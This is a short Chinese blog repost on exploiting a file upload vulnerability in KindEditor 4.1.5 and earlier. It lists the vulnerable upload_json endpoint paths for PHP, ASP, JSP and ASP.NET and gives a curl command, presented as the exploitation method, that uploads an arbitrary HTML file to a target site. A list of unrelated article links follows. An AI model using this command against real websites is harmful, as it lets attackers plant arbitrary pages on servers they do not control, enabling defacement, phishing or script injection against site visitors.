kindeditor<=4.1.5 文件上传漏洞利用-白红宇

kindeditor<=4.1.5 文件上传漏洞利用

阅读量：5341 次

发布时间：2019-06-15

本文共 526 字，大约阅读时间需要 1 分钟。

kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

　　漏洞存影响版本：小于等于4.1.5的kindeditor 编辑器

　　漏洞影响：上传任意. txt 和. html 文件

　　漏洞存在动态脚本语言： php/asp/jsp/asp.net

　　漏洞存在的证明文件：upload_json.* 具体路径如下：

　　/kindeditor/asp/upload_json.asp

　　/kindeditor/asp.net/upload_json.ashx

　　/kindeditor/jsp/upload_json.jsp

　　/kindeditor/php/upload_json.php

利用方式：

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html为想要上传的文件

在返回中得到上传后的路径，然后访问

转载于:https://www.cnblogs.com/iAmSoScArEd/p/10575936.html

你可能感兴趣的文章

触发器课程SQL Server 知识梳理九触发器的使用

查看>>

信息浏览器从Android的浏览器中传递cookie数据到App中信息浏览器

查看>>

客户端连接linux虚拟机集群报错

查看>>

linux下部署一个JavaEE项目的简单步骤

查看>>

hash储存机制

查看>>

[Android学习系列16]Android把php输出的json加载到listview

查看>>

20145205 《信息安全系统设计基础》第14周学习总结

SQL SERVER的锁机制（二）——概述（锁的兼容性与可以锁定的资源）

查看>>

POJ - 1422 Air Raid 二分图最大匹配

HI3531uboot开机画面分类： arm-linux-Ubunt...

查看>>

制作U盘启动CDLinux 分类：生活百科 ...

查看>>

leetcode——Best Time to Buy and Sell Stock

查看>>

Android LinearLayout 的几个属性